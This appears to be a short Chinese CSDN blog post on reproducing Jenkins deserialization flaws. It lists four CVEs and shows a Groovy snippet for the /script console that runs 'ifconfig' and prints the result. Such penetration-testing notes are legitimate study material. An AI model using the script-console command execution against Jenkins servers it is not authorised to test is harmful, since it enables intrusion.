Jenkins反序列化漏洞复现

Jenkins

Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件的持续集成变成可能。

Jenkins功能包括:

  • 持续的软件版本发布/测试项目。
  • 监控外部调用执行的工作。

Jenkins曾经发生的反序列化漏洞:

  • CVE-2015-8103
  • CVE-2016-9299
  • CVE-2017-1000353
  • CVE-2018-1000861

Jenkins后台执行命令

访问:http://xx.xx.xx.xx/script

def cmd = 'ifconfig'
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = cmd.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println sout

已标记关键词 清除标记
©️2020 CSDN 皮肤主题: Age of Ai 设计师:meimeiellie 返回首页
实付 19.90元
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值